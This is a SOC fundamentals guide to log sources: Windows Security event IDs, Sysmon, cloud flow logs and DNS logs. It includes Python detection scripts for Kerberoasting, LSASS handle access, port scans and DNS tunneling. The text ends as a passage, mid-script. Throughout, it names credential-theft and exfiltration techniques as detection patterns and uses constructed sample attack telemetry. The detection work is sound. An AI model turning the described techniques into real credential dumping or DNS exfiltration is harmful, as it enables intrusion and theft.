Fundamentals

T1654

Log Sources Overview

A comprehensive guide to the log sources every SOC needs --- Windows Event Logs, Sysmon, firewall logs, DNS, proxy, EDR, cloud audit logs --- and what each reveals during investigations.


Why Logs Are the Foundation and What to Collect

Alerts are signals: they tell you that something happened. Logs tell you what exactly, when, where, by which account and process, and how. Without logs, an alert is just noise. Every SOC investigation starts and ends in the logs.

The cardinal rule: collect everything you can, filter and tier later. Storing logs you never need (compressed, in cold storage, not indexed) is far cheaper than discovering mid-incident that you never collected the one you do. Retention matters as much as collection: an investigation that starts weeks after initial access needs logs from weeks ago.

Below is a source-by-source breakdown of what each log type captures, the key fields and Event IDs to know, and how analysts use each source.


Windows Security Event Log

The most important single log source for Windows environments. Captures authentication, privilege use, process creation, and policy changes.

Key Event IDs

Event ID | Name | What It Means
4624 | An account was successfully logged on | Successful authentication. Every logon generates one. Key fields: LogonType (2 interactive, 3 network, 9 NewCredentials, 10 RemoteInteractive/RDP), IpAddress, LogonProcessName, AuthenticationPackageName. Expected for normal activity, critical for tracking lateral movement.
4625 | An account failed to log on | Failed authentication. Many failures against one account = brute force; one or two failures across many accounts = password spray. Split by LogonType and by Status/SubStatus (0xC000006A wrong password, 0xC0000064 no such user) to separate guessing from enumeration.
4634 | An account was logged off | Session termination. Normal; pair with 4624 on TargetLogonId for session duration analysis.
4648 | A logon was attempted using explicit credentials | A process supplied alternate credentials: runas, runas /netonly, scheduled tasks, WMI or PsExec with a -u switch. Pass-the-hash tooling that injects credentials into a new logon session also produces this, so correlate with 4624 LogonType 9 (NewCredentials) and unusual source processes.
4672 | Special privileges assigned to new logon | The new logon holds one or more sensitive privileges (SeDebugPrivilege, SeTcbPrivilege, SeBackupPrivilege, SeRestorePrivilege, SeLoadDriverPrivilege, SeImpersonatePrivilege and others). Every admin logon generates it, but so do SYSTEM and service logons, so filter those before alerting.
4688 | A new process has been created | Process creation. The most important security event for endpoint detection, provided command-line logging is enabled (see the analyst note). Fields: NewProcessName, CommandLine, Creator Process Name (the parent), SubjectUserName, TokenElevationType. Essential for catching powershell.exe -EncodedCommand, rundll32.exe abuse and wscript.exe/cscript.exe execution. It carries no file hash; Sysmon Event ID 1 does.
4698 | A scheduled task was created | Scheduled task creation. Malware persists via tasks (T1053.005). The task XML is embedded in the event: check Command, Arguments and the RunAs principal.
4700 | A scheduled task was enabled | Task activation. Check alongside 4698; 4702 (task updated) covers the common trick of hijacking an existing task instead of creating a new one.
4719 | System audit policy was changed | Attacker covering tracks or disabling logging (T1562.002). Outside of GPO rollouts this should be rare; any instance is high-priority.
4720 | A user account was created | New user creation. Attackers create backdoor accounts (T1136.001). Compare with HR onboarding and change records.
4728 | A member was added to a security-enabled global group | High-value group membership change. Domain Admins is a global group, so additions to it appear here (T1098). Enterprise Admins is a universal group: watch 4756 as well.
4732 | A member was added to a security-enabled local group | Local Administrators additions, plus Remote Desktop Users and Remote Management Users.
4740 | A user account was locked out | Account lockout. Could be brute force or user error. Check the surrounding 4625 events and the CallerComputerName.
4768 | A Kerberos authentication ticket (TGT) was requested | TGT request, logged on the domain controller. Failed pre-authentication is a separate event, 4771: a burst of 4771 across many accounts is Kerberos password spraying. A 4768 with PreAuthType 0 and TicketEncryptionType 0x17 is the AS-REP roasting pattern (T1558.004).
4769 | A Kerberos service ticket was requested | TGS request, logged on the domain controller. Kerberoasting (T1558.003) looks like one account, from one source IP, requesting tickets for many distinct SPNs within a short window, usually with TicketEncryptionType 0x17 (RC4) in a domain that otherwise issues AES (0x12) tickets. The same service requested by many hosts is normal traffic.
4776 | The computer attempted to validate the credentials for an account | NTLM authentication validated (on the DC for domain accounts, on the member itself for local accounts). Critical for pass-the-hash detection (T1550.002); pair with 4624 LogonType 3 and AuthenticationPackageName NTLM on the target.
4778 | A session was reconnected to a Window Station | RDP or fast-user-switching session reconnect, with ClientName and ClientAddress. Useful for RDP session tracking (T1021.001).
4779 | A session was disconnected from a Window Station | RDP disconnect; pair with 4778.
5136 | A directory service object was modified | AD object modification (domain controllers only; needs Audit Directory Service Changes plus a SACL on the objects). Tracks attribute changes such as servicePrincipalName, userAccountControl or AdminSDHolder.
5140 | A network share object was accessed | SMB share access. Useful for tracking data access patterns.
5145 | A network share object was checked to see whether client can be granted desired access | Per-file share access (very noisy; needs Detailed File Share auditing). Access to ADMIN$ or C$ that writes a service executable is the classic PsExec signature (T1021.002).
5156 | The Windows Filtering Platform has permitted a connection | Connection allowed by the host firewall, including the Application Name, so it ties connections to processes. High volume; Sysmon Event ID 3 is usually preferred.
5157 | The Windows Filtering Platform has blocked a connection | Connection blocked by the host firewall. Tracks blocked outbound attempts from the host itself.
5379 | Credential Manager credentials were read | Windows Credential Manager access (T1555.004). Browsers, Office and Outlook read it constantly, so alert on unusual source processes rather than on the event alone. LSASS memory dumping (T1003.001) does not produce this event; see Sysmon Event ID 10.

Where to find it: Event Viewer > Windows Logs > Security (channel name Security), or centrally via Windows Event Forwarding or the SIEM agent. Most of these IDs only appear if the matching Advanced Audit Policy subcategory is enabled, and the Kerberos events (4768, 4769, 4771) and 5136 exist only on domain controllers.

Analyst note: 4688 carries no command line until you turn it on. Enable Computer Configuration > Policies > Administrative Templates > System > Audit Process Creation > Include command line in process creation events, together with Advanced Audit Policy Configuration > Detailed Tracking > Audit Process Creation (Success). Neither is on by default, and together they are the single highest-value logging change you can make. Command lines can contain passwords, so restrict who can read the Security log accordingly.
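The 4769 row above describes the Kerberoasting pattern; the script below, an added example that is not code from the original page, applies it to exported 4769 records. It assumes the events have been pulled off the domain controller (EVTX-to-JSON, WEF or a SIEM export) as dicts carrying the EventData field names Windows uses. The sample records, the ten-minute window and the five-SPN threshold are constructed assumptions to tune against your own domain.

```python
"""Kerberoasting triage over Windows Security Event ID 4769 records.

Added example, not code from the original page. Assumes 4769 events exported
from the DC as dicts keyed by the EventData field names. Sample data below is
constructed for illustration.
"""
from collections import defaultdict
from datetime import datetime, timedelta

RC4_ETYPES = {"0x17", "0x18"}   # RC4-HMAC and RC4-HMAC-EXP ticket encryption types


def rec(time, user, service, ip, etype, status="0x0"):
    """Build a minimal 4769 record with just the fields the detection needs."""
    return {"TimeCreated": time, "TargetUserName": user, "ServiceName": service,
            "IpAddress": ip, "TicketEncryptionType": etype, "Status": status}


# Constructed sample: 10.1.5.23 requests RC4 tickets for six SPNs in two
# seconds; the remaining records are ordinary Kerberos traffic.
SAMPLE_4769 = [
    rec("2024-03-01T10:00:01", "jsmith@CORP.LOCAL", "svc_sql", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:01", "jsmith@CORP.LOCAL", "svc_backup", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:02", "jsmith@CORP.LOCAL", "svc_web", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:02", "jsmith@CORP.LOCAL", "svc_sccm", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:02", "jsmith@CORP.LOCAL", "svc_exchange", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:03", "jsmith@CORP.LOCAL", "svc_vmware", "::ffff:10.1.5.23", "0x17"),
    rec("2024-03-01T10:00:03", "jsmith@CORP.LOCAL", "krbtgt", "::ffff:10.1.5.23", "0x12"),  # TGT renewal
    rec("2024-03-01T10:00:03", "jsmith@CORP.LOCAL", "FS01$", "::ffff:10.1.5.23", "0x17"),   # machine account
    rec("2024-03-01T08:00:00", "APP01$@CORP.LOCAL", "svc_sql", "::ffff:10.1.7.40", "0x12"),  # AES, hours apart
    rec("2024-03-01T14:00:00", "APP01$@CORP.LOCAL", "svc_sql", "::ffff:10.1.7.40", "0x12"),
    rec("2024-03-01T09:30:00", "legacyapp@CORP.LOCAL", "svc_print", "::ffff:10.1.9.9", "0x17"),  # one RC4 ticket
]


def candidate(event):
    """True for successful RC4 service-ticket requests against user-account SPNs."""
    if event.get("Status", "0x0") != "0x0":
        return False                      # failed TGS requests are a separate signal
    if event["TicketEncryptionType"].lower() not in RC4_ETYPES:
        return False                      # AES tickets are not practically crackable
    service = event["ServiceName"]
    # Machine accounts (NAME$) have long random passwords and krbtgt requests
    # are TGT renewals; neither is a Kerberoasting target.
    return not service.endswith("$") and service.lower() != "krbtgt"


def find_kerberoasting(events, window=timedelta(minutes=10), min_spns=5):
    """Return {(source_ip, requesting_account): sorted SPNs} for each source
    that requested RC4 tickets for >= min_spns distinct SPNs inside `window`."""
    by_source = defaultdict(list)
    for e in events:
        if candidate(e):
            key = (e["IpAddress"], e["TargetUserName"])
            by_source[key].append((datetime.fromisoformat(e["TimeCreated"]),
                                   e["ServiceName"].lower()))
    hits = {}
    for key, requests in by_source.items():
        requests.sort()
        for i, (t0, _) in enumerate(requests):          # sliding window over time
            spns = {spn for t, spn in requests[i:] if t - t0 <= window}
            if len(spns) >= min_spns:
                hits[key] = sorted(spns)
                break
    return hits


if __name__ == "__main__":
    for (ip, account), spns in find_kerberoasting(SAMPLE_4769).items():
        print(f"{ip} as {account}: RC4 tickets for {len(spns)} SPNs: {', '.join(spns)}")
```

The encryption-type filter is what keeps this quiet in practice: legacy applications that genuinely need RC4 show up as one or two SPNs per host, not a dozen in a burst, and a domain that still issues RC4 tickets everywhere should treat that as a finding in itself.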


Sysmon

Microsoft Sysinternals’ Sysmon sits on Windows endpoints and provides granular telemetry that the built-in security log does not capture. It is the de facto standard for endpoint visibility.

Key Event IDs

Event ID | Name | What It Means
1 | Process creation | Like 4688 with more fields: Image, CommandLine, ParentImage, ParentCommandLine, User, ProcessGuid and Hashes (MD5/SHA1/SHA256/IMPHASH, as configured). The hash enables an immediate file reputation check; ProcessGuid survives PID reuse.
2 | A process changed a file creation time | Timestomping (T1070.006). Records both PreviousCreationUtcTime and the new CreationUtcTime, so the original value is preserved. Some installers do this legitimately.
3 | Network connection | TCP/UDP connections per process: Image, User, SourceIp, DestinationIp, DestinationPort, DestinationHostname, Initiated. Essential for beaconing, data exfiltration and lateral movement detection.
4 | Sysmon service state changed | Sysmon started or stopped. Stopped outside a maintenance window = attacker disabling endpoint visibility. Immediate escalation.
5 | Process terminated | Process exit. Useful for process lifetime analysis.
6 | Driver loaded | Kernel driver loading, with Signature and SignatureStatus. Unsigned, vulnerable or revoked-certificate drivers (bring-your-own-vulnerable-driver) circumvent user-mode protections (T1068, T1014).
7 | Image loaded | DLL loaded into a process: Image, ImageLoaded, Signed, Signature. Detects DLL side-loading (T1574.002), unsigned DLLs loaded from user-writable paths and DLL injection (T1055.001). Very high volume: filter by path and signature in the config.
8 | CreateRemoteThread | A process created a thread in another process: a strong process injection indicator (T1055). Check SourceImage, TargetImage and StartFunction (LoadLibrary is the classic DLL injection pattern).
9 | RawAccessRead | A process read the disk through a raw volume handle (\\.\PhysicalDrive0 or \\.\C:), bypassing file ACLs and locks. Used to copy NTDS.dit, SAM and SYSTEM (T1003.003, T1006). Backup and imaging software do this legitimately.
10 | ProcessAccess | One process opened a handle to another (OpenProcess): SourceImage, TargetImage, GrantedAccess, CallTrace. lsass.exe as target with memory-read rights (0x1010, 0x1410, 0x1FFFFF) from a process outside your allowlist is the credential-dumping indicator (T1003.001).
11 | FileCreate | File creation. Useful for tracking malware drops, especially in suspicious directories (Users\*\AppData, Windows\Temp).
12 | RegistryEvent (Object create and delete) | Registry key creation and deletion. Persistence mechanism detection (T1547).
13 | RegistryEvent (Value set) | Registry value modification. Run keys, service ImagePath values, IFEO debuggers and COM hijacks all land here (T1547.001, T1546.012, T1546.015).
14 | RegistryEvent (Key and value rename) | Registry renaming. Rare; usually indicates deliberate evasion.
15 | FileCreateStreamHash | Alternate Data Stream created. Attackers hide payloads in ADS on NTFS (T1564.004). The same event records the Zone.Identifier stream browsers write, so it also tells you which files were downloaded from the internet.
16 | Sysmon configuration change | Sysmon config updated. Compare against the approved configuration baseline.
17 | Pipe created | Named pipe creation. PsExec (PSEXESVC), Cobalt Strike SMB beacons and many lateral movement tools use distinctive pipe names (T1021.002, T1570).
18 | Pipe connected | Named pipe connection. Tracks which process connects to which pipe.
19 | WmiEventFilter | WMI event filter creation. WMI event subscription persistence (T1546.003).
20 | WmiEventConsumer | WMI event consumer creation. The consumer is the payload (a command line or script).
21 | WmiEventConsumerToFilter | Filter-to-consumer binding, the piece that actually arms the subscription.
22 | DNSEvent | DNS query per process: QueryName, QueryStatus, QueryResults, Image. Ties a lookup to the process that made it, which a resolver log cannot do. Essential for DNS tunneling and C2 beacon investigations.

Later Sysmon versions add 23 and 26 (FileDelete, with optional archiving of the deleted file), 24 (ClipboardChange), 25 (ProcessTampering: process hollowing and herpaderping) and 29 (FileExecutableDetected).

Where to find it: Applications and Services Logs > Microsoft > Windows > Sysmon/Operational

Analyst note: Sysmon Event ID 3 (network connections) and Event ID 22 (DNS queries) are the most valuable for network-based threat detection, and neither is logged by Sysmon's built-in defaults (nor is Event ID 7); all three must be enabled by a configuration file with filters. SwiftOnSecurity's sysmon-config and Olaf Hartong's sysmon-modular are the usual community starting points; neither ships with Sysmon, and both need tuning for your environment.
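The Event ID 10 row names the LSASS access pattern; the script below, an added example that is not code from the original page or from Sysmon, turns it into a triage rule. It decodes the GrantedAccess mask into the Win32 PROCESS_* rights, checks SourceImage against an allowlist, and treats an UNKNOWN frame in CallTrace (code not backed by a file on disk) as an aggravating factor. The allowlist and the sample events are constructed assumptions.

```python
"""Triage of Sysmon Event ID 10 (ProcessAccess) against lsass.exe.

Added example, not from the original page or from Sysmon. Assumes events
exported as dicts keyed by the EventData names SourceImage, TargetImage,
GrantedAccess and CallTrace. Allowlist and samples are constructed.
"""
from fnmatch import fnmatch

# Win32 process access rights (subset relevant to credential dumping)
PROCESS_CREATE_THREAD = 0x0002
PROCESS_VM_READ = 0x0010
PROCESS_VM_WRITE = 0x0020
PROCESS_DUP_HANDLE = 0x0040
PROCESS_ALL_ACCESS = 0x1FFFFF
RIGHT_NAMES = {PROCESS_CREATE_THREAD: "PROCESS_CREATE_THREAD", PROCESS_VM_READ: "PROCESS_VM_READ",
               PROCESS_VM_WRITE: "PROCESS_VM_WRITE", PROCESS_DUP_HANDLE: "PROCESS_DUP_HANDLE"}

# Processes expected to open LSASS with read rights. Assumption: tune per estate.
LSASS_ALLOWLIST = [
    r"c:\windows\system32\csrss.exe",
    r"c:\windows\system32\wininit.exe",
    r"c:\windows\system32\services.exe",
    r"c:\windows\system32\svchost.exe",
    r"c:\programdata\microsoft\windows defender\platform\*\msmpeng.exe",
]


def decode_access(granted):
    """Name the risky bits in a GrantedAccess mask, e.g. 0x1010 -> ['PROCESS_VM_READ'].
    0x1000 (QUERY_LIMITED_INFORMATION) alone decodes to [] and is benign."""
    if granted == PROCESS_ALL_ACCESS:
        return ["PROCESS_ALL_ACCESS"]
    return [name for bit, name in RIGHT_NAMES.items() if granted & bit]


def triage_lsass_access(events):
    """Return findings for LSASS handle opens carrying dangerous rights from a
    source outside the allowlist, or whose call trace shows unbacked code."""
    findings = []
    for e in events:
        if not e["TargetImage"].lower().endswith("\\lsass.exe"):
            continue
        src = e["SourceImage"].lower()
        granted = int(e["GrantedAccess"], 16)
        risky = decode_access(granted)
        allowed = any(fnmatch(src, pattern) for pattern in LSASS_ALLOWLIST)
        # UNKNOWN frames: the caller is shellcode, a reflectively loaded DLL or
        # an injected module, even when the host process looks legitimate.
        unbacked = "UNKNOWN" in e.get("CallTrace", "")
        if not risky:
            continue
        if allowed and not unbacked:
            continue
        findings.append({"source": e["SourceImage"], "granted": f"{granted:#x}",
                         "rights": risky, "unbacked_caller": unbacked})
    return findings


_TRACE_OK = r"C:\Windows\SYSTEM32\ntdll.dll+9d0c4|C:\Windows\System32\KERNELBASE.dll+2bdbe"
_LSASS = r"C:\Windows\system32\lsass.exe"

# Constructed sample events
SAMPLE_EVENTS = [
    {"SourceImage": r"C:\Users\bob\Downloads\m.exe", "TargetImage": _LSASS, "GrantedAccess": "0x1010",
     "CallTrace": r"C:\Windows\SYSTEM32\ntdll.dll+9d0c4|UNKNOWN(00000000001F0000)"},
    {"SourceImage": r"C:\Tools\procdump64.exe", "TargetImage": _LSASS, "GrantedAccess": "0x1FFFFF",
     "CallTrace": _TRACE_OK},
    {"SourceImage": r"C:\Windows\system32\svchost.exe", "TargetImage": _LSASS, "GrantedAccess": "0x1400",
     "CallTrace": _TRACE_OK},
    {"SourceImage": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.24010.7-0\MsMpEng.exe",
     "TargetImage": _LSASS, "GrantedAccess": "0x1FFFFF", "CallTrace": _TRACE_OK},
    {"SourceImage": r"C:\Windows\system32\wbem\wmiprvse.exe", "TargetImage": _LSASS, "GrantedAccess": "0x1000",
     "CallTrace": _TRACE_OK},
]

if __name__ == "__main__":
    for finding in triage_lsass_access(SAMPLE_EVENTS):
        print(finding)
```

Alerting on the mask rather than on "any handle to LSASS" is what makes this rule usable: diagnostic and management tooling opens LSASS with 0x1000 or 0x1400 all day, and those masks cannot read memory.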


Firewall Logs

Firewall logs record allowed and blocked network connections at the network perimeter and between network segments.

What They Capture

  • Source IP/Port and Destination IP/Port
  • Protocol (TCP, UDP, ICMP)
  • Action (Allow, Deny, Drop, Reset)
  • Timestamp and Interface
  • Packet size and TCP flags (on some platforms)

Analyst Use Cases

  • Outbound connection monitoring: Allowed outbound connections to unknown IPs. Cross-reference with threat intelligence feeds.
  • Blocked traffic analysis: Dropped inbound connections are normal (internet background noise), but blocked outbound traffic from an internal host to an external IP deserves a look: it is either a misconfigured application, a policy violation, or a compromised host trying to reach C2 on a port you do not allow.
  • Port scan detection: High volume of denied connections from a single source IP targeting multiple ports = scanning activity (T1046).
  • Data exfiltration: Unusually large outbound packets or persistent outbound connections to a single external IP at regular intervals.

Cloud Firewall Examples

AWS VPC Flow Logs (not a security-group log as such: each record is one flow, aggregated over a 1- or 10-minute capture window, with the verdict of the security group and network ACL evaluation):

  • Default format: version, account-id, interface-id, srcaddr, dstaddr, srcport, dstport, protocol, packets, bytes, start, end, action (ACCEPT or REJECT), log-status (OK, NODATA or SKIPDATA). Custom formats can add tcp-flags, pkt-srcaddr/pkt-dstaddr, flow-direction and traffic-path.
  • Starting query: action = REJECT and dstport not in (443, 80, 53), then split by whether srcaddr is inside your VPC CIDR (blocked outbound, investigate) or outside (inbound noise, baseline).
  • Caveats: no payload and no DNS names, and a stateful security-group deny looks identical to a NACL deny unless flow-direction is logged.

Azure NSG Flow Logs:

  • FlowDirection (I = inbound, O = outbound), FlowStatus (A = allowed, D = denied), source and destination IP and port, protocol, and in version 2 the flow state (B begin, C continuing, E end) with byte and packet counts.
  • Query: FlowStatus = D and FlowDirection = O, outbound traffic the NSG denied.
  • Microsoft has announced the retirement of NSG flow logs in favour of virtual network flow logs, which carry the same analytic fields; plan the migration.

GCP VPC Flow Logs:

  • Similar structure under jsonPayload.connection: src_ip, dest_ip, src_port, dest_port, protocol, plus bytes_sent, packets_sent and reporter (SRC or DEST).
  • Caveat: VPC Flow Logs are sampled and record accepted flows only. Denied traffic appears in Firewall Rules Logging, which must be enabled per rule and records the matching rule and its disposition.
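The port-scan and blocked-outbound use cases above, run over AWS VPC Flow Log lines as an added example that is not code from the original page or from AWS. It assumes the default 14-field flow-log format; the internal CIDRs, the expected egress ports, the scan threshold and the log lines themselves are constructed assumptions.

```python
"""Port-scan and unusual-egress triage over AWS VPC Flow Log lines.

Added example, not from the original page or from AWS. Assumes the default
flow-log format (14 space-separated fields). CIDRs, port allowlist and
sample lines are constructed.
"""
import ipaddress
from collections import defaultdict

FIELDS = ("version account_id interface_id srcaddr dstaddr srcport dstport "
          "protocol packets bytes start end action log_status").split()
INT_FIELDS = ("srcport", "dstport", "protocol", "packets", "bytes", "start", "end")
INTERNAL = [ipaddress.ip_network(c) for c in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]
EXPECTED_EGRESS_PORTS = {53, 80, 123, 443}      # assumption: what this VPC should talk to


def parse_flow_line(line):
    """Parse one default-format record; '-' fields (NODATA/SKIPDATA rows) become 0."""
    parts = line.split()
    if len(parts) != len(FIELDS):
        raise ValueError(f"expected {len(FIELDS)} fields, got {len(parts)}: {line!r}")
    rec = dict(zip(FIELDS, parts))
    for f in INT_FIELDS:
        rec[f] = 0 if rec[f] == "-" else int(rec[f])
    return rec


def is_internal(addr):
    return addr != "-" and any(ipaddress.ip_address(addr) in net for net in INTERNAL)


def analyze_flows(lines, scan_threshold=10):
    """Return (unusual_egress, scanners).
    unusual_egress: REJECTed flows from inside the VPC to outside on a port not
                    in EXPECTED_EGRESS_PORTS (C2 attempt or policy gap).
    scanners: external sources REJECTed on >= scan_threshold distinct ports."""
    unusual_egress = []
    rejected_ports = defaultdict(set)
    for line in lines:
        if not line.strip() or line.startswith("version "):
            continue                                  # blank or header line
        rec = parse_flow_line(line)
        if rec["log_status"] != "OK" or rec["action"] != "REJECT":
            continue
        src_in, dst_in = is_internal(rec["srcaddr"]), is_internal(rec["dstaddr"])
        if src_in and not dst_in and rec["dstport"] not in EXPECTED_EGRESS_PORTS:
            unusual_egress.append(rec)
        if not src_in:
            rejected_ports[rec["srcaddr"]].add(rec["dstport"])
    scanners = {ip: sorted(p) for ip, p in rejected_ports.items() if len(p) >= scan_threshold}
    return unusual_egress, scanners


# Constructed sample: an internet host probing 12 ports on one instance, an
# instance trying to reach 203.0.113.7:4444, and ordinary accepted traffic.
SCANNED_PORTS = [21, 22, 23, 25, 80, 110, 135, 139, 443, 445, 3389, 8080]
_ENI = "2 123456789012 eni-0a1b2c3d4e5f"
SAMPLE_LINES = [
    "version account-id interface-id srcaddr dstaddr srcport dstport protocol "
    "packets bytes start end action log-status",
] + [
    f"{_ENI} 198.51.100.9 10.0.1.15 51000 {port} 6 1 44 1709287200 1709287260 REJECT OK"
    for port in SCANNED_PORTS
] + [
    f"{_ENI} 10.0.1.15 203.0.113.7 49152 4444 6 3 180 1709287300 1709287360 REJECT OK",
    f"{_ENI} 10.0.2.8 203.0.113.7 49153 443 6 2 120 1709287300 1709287360 REJECT OK",
    f"{_ENI} 10.0.1.15 10.0.2.8 49200 445 6 20 4096 1709287300 1709287360 ACCEPT OK",
    f"{_ENI} 10.0.1.15 198.51.100.44 49201 443 6 30 16000 1709287300 1709287360 ACCEPT OK",
    f"{_ENI} - - - - - - - 1709287300 1709287360 - NODATA",
]

if __name__ == "__main__":
    egress, scanners = analyze_flows(SAMPLE_LINES)
    for rec in egress:
        print(f"unusual egress: {rec['srcaddr']} -> {rec['dstaddr']}:{rec['dstport']}")
    for ip, ports in scanners.items():
        print(f"scanner: {ip} rejected on {len(ports)} ports {ports}")
```

The 10.0.2.8 flow to 203.0.113.7:443 is rejected but not reported, because 443 is an expected egress port: the rule is about unusual destinations, and a REJECT on an expected port is a firewall policy question rather than a compromise indicator. Swap the port allowlist for a destination allowlist if your VPC has a small, known set of egress targets.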

DNS Query Logs

DNS logs are the most underappreciated detection source in most SOCs. Nearly every connection starts with a DNS query (malware that hard-codes IP addresses is the exception, and firewall logs cover that case). Capture queries at the recursive resolver (Windows DNS Server analytic log, BIND querylog, Unbound) and, where you can, per process on the endpoint with Sysmon Event ID 22. Block DNS-over-HTTPS to resolvers you do not control, or the queries never reach your log. With full coverage you have a baseline of every domain being accessed.

What They Capture

  • Client IP — who asked
  • Query name — what domain
  • Query type — A, AAAA, CNAME, MX, TXT, ANY
  • Response IP — what the domain resolved to
  • Response code — NXDOMAIN, NOERROR, SERVFAIL
  • Timestamp

Analyst Use Cases

  • DGAs (Domain Generation Algorithms): Random-looking domain names (e.g., a7x9p2zq1.example). Only a handful of the generated names are ever registered, so an infected host produces a high NXDOMAIN rate (many failed lookups per successful one). That rate, measured per client, is the DGA signal (T1568.002).
  • DNS tunneling: High volume of TXT, CNAME or NULL queries carrying long (> 30 character), high-entropy labels under one parent domain, all from a single host (T1071.004, T1572).
  • Newly observed domains (NODs): Domains registered < 30 days ago that appear in your DNS logs. A leading indicator of phishing sites and C2 infrastructure; needs a domain-age source (RDAP/WHOIS or passive DNS first-seen).
  • Beaconing: Regular query intervals (every 60 minutes on the dot to the same domain). Time-between-queries (TBQ) analysis works on DNS logs, with one caveat: a stub resolver caches the answer for the record TTL, so a resolver-side log only sees repeated queries when the TTL is short (C2 domains often use TTLs of seconds). Endpoint-side logs (Sysmon 22) see every query regardless of cache.
  • Fast flux: Rapidly changing A records for a single domain; it resolves to different IPs in quick succession, indicating fast-flux botnet infrastructure.

Example Indicators

Indicator | What to Look For
High TXT query volume | DNS tunneling for C2 or exfiltration
Long label (> 30 chars) | Data encoded into DNS queries
High NXDOMAIN rate (> 50%) | DGAs, or malware probing for C2 domains that are not registered yet
Consistent query intervals (every 60 min ± 5 min) | C2 beaconing
Query to a domain registered < 30 days ago | Suspicious domain, needs investigation

These thresholds are starting points, not fixed cut-offs. Tune them against your own baseline: CDNs, telemetry and anti-virus lookup services routinely produce long labels and TXT queries.
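The per-client NXDOMAIN, TXT and long-label indicators above, as an added example that is not code from the original page. It assumes resolver query logs normalised to CSV (timestamp, client_ip, qname, qtype, rcode), a shape that Windows DNS analytic logs, BIND querylog and Unbound output can all be mapped to; the thresholds, the naive registrable-label split and the sample log lines are constructed assumptions.

```python
"""Per-client DNS query profiling for DGA and tunneling triage.

Added example, not from the original page. Assumes resolver logs normalised
to CSV columns timestamp, client_ip, qname, qtype, rcode. Thresholds and
sample lines are constructed.
"""
import csv
import io
import math
from collections import defaultdict

NXDOMAIN_RATE = 0.5     # share of a client's queries that fail (DGA heuristic)
TXT_RATE = 0.5          # share of TXT queries (tunneling heuristic)
LONG_LABEL = 30         # characters in one label (encoded-data heuristic)
MIN_QUERIES = 5         # do not score clients with too little traffic


def shannon_entropy(s):
    """Bits per character; random-looking labels score higher than words."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    return -sum(c / len(s) * math.log2(c / len(s)) for c in counts.values())


def registrable_label(qname):
    """Label left of the TLD. Naive: production code should use the Public Suffix List."""
    labels = qname.rstrip(".").split(".")
    return labels[-2] if len(labels) >= 2 else labels[0]


def profile_clients(log_text):
    """Return {client_ip: [reasons]} for clients whose query mix crosses a threshold."""
    stats = defaultdict(lambda: {"total": 0, "nx": 0, "txt": 0, "long": 0, "entropy": []})
    for row in csv.DictReader(io.StringIO(log_text)):
        s = stats[row["client_ip"]]
        s["total"] += 1
        s["nx"] += int(row["rcode"] == "NXDOMAIN")
        s["txt"] += int(row["qtype"] == "TXT")
        s["long"] += int(max(len(label) for label in row["qname"].split(".")) > LONG_LABEL)
        s["entropy"].append(shannon_entropy(registrable_label(row["qname"])))

    findings = {}
    for ip, s in stats.items():
        if s["total"] < MIN_QUERIES:
            continue
        reasons = []
        if s["nx"] / s["total"] > NXDOMAIN_RATE:
            mean_entropy = sum(s["entropy"]) / len(s["entropy"])
            reasons.append(f"NXDOMAIN rate {s['nx'] / s['total']:.0%}, "
                           f"mean label entropy {mean_entropy:.2f} bits (DGA?)")
        if s["txt"] / s["total"] > TXT_RATE:
            reasons.append(f"TXT queries are {s['txt'] / s['total']:.0%} of traffic (tunneling?)")
        if s["long"] / s["total"] > 0.5:
            reasons.append(f"{s['long']} of {s['total']} queries carry a label over "
                           f"{LONG_LABEL} chars (encoded data?)")
        if reasons:
            findings[ip] = reasons
    return findings


# Constructed sample: 10.1.5.23 shows DGA behaviour, 10.1.9.9 tunnels data in
# TXT queries, 10.1.7.40 is a normal workstation with one typo.
SAMPLE_DNS_LOG = """timestamp,client_ip,qname,qtype,rcode
2024-03-01T10:00:00,10.1.5.23,login.microsoftonline.com,A,NOERROR
2024-03-01T10:00:01,10.1.5.23,xk2qpd9wvtz.info,A,NXDOMAIN
2024-03-01T10:00:01,10.1.5.23,b7h3mqz0ekr.info,A,NXDOMAIN
2024-03-01T10:00:02,10.1.5.23,qw9vlt4nzpc.info,A,NXDOMAIN
2024-03-01T10:00:02,10.1.5.23,mz0e8kyvr3x.info,A,NXDOMAIN
2024-03-01T10:00:03,10.1.5.23,tp4jsx7hbq2.info,A,NXDOMAIN
2024-03-01T10:00:03,10.1.5.23,cv6rnl1zwgy.info,A,NXDOMAIN
2024-03-01T10:00:04,10.1.5.23,hd3ybwq8ftk.info,A,NXDOMAIN
2024-03-01T10:00:04,10.1.5.23,ne5kzp0rvjl.info,A,NOERROR
2024-03-01T10:00:05,10.1.5.23,outlook.office365.com,A,NOERROR
2024-03-01T10:01:00,10.1.9.9,mfrggzdfmztwq2lknnwg23tpobyxe43uov3ho6dzpi.t.example.net,TXT,NOERROR
2024-03-01T10:01:02,10.1.9.9,mzxw6ytboi4tcnrrgmzdeoizgm2tqmrsha4tsnbzgq.t.example.net,TXT,NOERROR
2024-03-01T10:01:04,10.1.9.9,nbswy3dpfqqgm2lsmnsxg5dfmrqwk3tdf5sdimrqgi.t.example.net,TXT,NOERROR
2024-03-01T10:01:06,10.1.9.9,onsw45dfnzrwkicyn5sgk3tdmrqwy43fmzzw4z3cmq.t.example.net,TXT,NOERROR
2024-03-01T10:01:08,10.1.9.9,kn2wg3dfonswy5lomuqhk43fojtgq2lom5qxeidtme.t.example.net,TXT,NOERROR
2024-03-01T10:01:10,10.1.9.9,pfxhg2lmm5sxeidfon2gc5dfmqqhezlqmvqxizlemq.t.example.net,TXT,NOERROR
2024-03-01T10:02:00,10.1.7.40,www.wikipedia.org,A,NOERROR
2024-03-01T10:02:01,10.1.7.40,github.com,A,NOERROR
2024-03-01T10:02:03,10.1.7.40,api.github.com,A,NOERROR
2024-03-01T10:02:10,10.1.7.40,teams.microsoft.com,A,NOERROR
2024-03-01T10:02:15,10.1.7.40,intranet.corp.loca,A,NXDOMAIN
2024-03-01T10:02:20,10.1.7.40,update.googleapis.com,A,NOERROR
"""

if __name__ == "__main__":
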